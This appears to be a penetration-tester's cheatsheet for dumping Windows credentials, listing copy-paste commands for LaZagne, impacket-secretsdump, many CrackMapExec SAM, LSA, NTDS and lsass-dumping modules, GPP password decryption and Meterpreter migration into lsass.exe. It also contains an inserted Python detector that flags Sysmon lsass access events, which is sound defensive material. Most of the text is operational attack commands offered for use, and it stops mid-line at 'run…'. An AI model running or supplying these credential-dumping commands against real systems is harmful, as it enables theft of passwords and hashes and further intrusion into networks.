Windows — Credentials Dumping

Karol Mazurek
3 min read · Mar 10, 2022

Cheatsheet with current tools & techniques for Windows credentials dumping.

INTRODUCTION

This article presents the current tools and techniques for Windows credential dumping. It is very short and written in cheatsheet style: the main goal is to aggregate the commands in one place so you can copy and paste them during an assessment. As a bonus, at the end of the article you will find the commands for cracking Windows hashes with John the Ripper and Hashcat.

TOOLS

  1. LaZagne
  2. Impacket
  3. CrackMapExec
  4. HiveNightmare (CVE-2021-36934)
  5. Meterpreter — credential_collector
  6. Meterpreter — smart_hashdump

COMMANDS

  • Finding passwords stored by the most commonly used software:
      laZagne.exe all
  • Manual search for the text "password" in certain file types (double quotes, since cmd.exe treats single quotes as literal characters; /s recurses, /i ignores case):
      findstr /si "password" *.txt *.xml *.docx
  • Remote hash dumping without executing any agent on the target:
      impacket-secretsdump $domain/$user:$pass@$ip
  • Various hash dumping techniques using CME:
    (use the option --local-auth if your user is a local account)
      crackmapexec smb $ip -u $user -p $pass --sam
      crackmapexec smb $ip -u $user -p $pass --lsa
      crackmapexec smb $ip -u $user -p $pass --ntds
      crackmapexec smb $ip -u $user -p $pass --ntds vss
      crackmapexec smb $ip -u $user -p $pass -M lsassy
      crackmapexec smb $ip -u $user -p $pass -M wireless
      crackmapexec smb $ip -u $user -p $pass -M handlekatz
      crackmapexec smb $ip -u $user -p $pass -M nanodump
      crackmapexec smb $ip -u $user -p $pass -M procdump
      crackmapexec smb $ip -u $user -p $pass --laps
      crackmapexec smb $ip -u $user -p $pass -M gpp_password

If the LAPS-managed local administrator account is not named administrator, add the account name after the option: --laps <name>
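The lsassy, handlekatz, nanodump and procdump modules above all obtain credentials by opening a handle to lsass.exe and reading its memory, which is exactly what Sysmon Event ID 10 (ProcessAccess) records on the target. The following is an added detection-side example, not code from the original cheatsheet or from any of the listed tools: it filters constructed Sysmon-style ProcessAccess records and flags any non-allowlisted source process that opens lsass.exe with PROCESS_VM_READ. The sample records, the simplified JSON shape and the allowlist of legitimate source images are assumptions to adapt to your environment.

```python
import json

# Constructed Sysmon Event ID 10 (ProcessAccess) records, reduced to the three
# fields this check needs. Sample data for the example, not real telemetry.
SAMPLE_EVENTS = [json.loads(line) for line in r'''
{"SourceImage": "C:\\Users\\bob\\Downloads\\procdump64.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"}
{"SourceImage": "C:\\Windows\\System32\\Taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"SourceImage": "C:\\Users\\bob\\Downloads\\procdump64.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1FFFFF"}
'''.strip().splitlines()]

# Access right that a memory dump of lsass cannot do without
# (MiniDumpWriteDump-style dumpers request at least VM_READ plus query rights).
PROCESS_VM_READ = 0x0010

# Assumed allowlist of images that legitimately open lsass with VM_READ
# (security products, core OS processes). Tune per environment; lower-case paths.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def is_lsass_dump_candidate(event: dict) -> bool:
    """True when a non-allowlisted process opens lsass.exe with PROCESS_VM_READ."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    try:
        granted = int(event.get("GrantedAccess", "0x0"), 16)  # Sysmon logs a hex string
    except ValueError:
        return False  # malformed record: do not crash the pipeline, just skip it
    if not granted & PROCESS_VM_READ:
        return False  # e.g. Task Manager querying limited information only
    source = event.get("SourceImage", "").lower()
    return source not in ALLOWLIST


def find_suspicious(events: list) -> list:
    """Return the records that warrant an alert, in log order."""
    return [e for e in events if is_lsass_dump_candidate(e)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT: {hit['SourceImage']} opened lsass.exe with {hit['GrantedAccess']}")
```

In the sample data only the procdump64.exe handle to lsass.exe is reported; the Defender engine is allowlisted, Task Manager lacks VM_READ, and the notepad.exe access is ignored because it does not target lsass.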

  • Decrypting GPP:
      gpp-decrypt $encrypted_password
  • Meterpreter modules:
    (a good idea is to first migrate to the lsass.exe process)
      migrate <id of lsass.exe>
      run…
Karol Mazurek

Offensive Security Engineer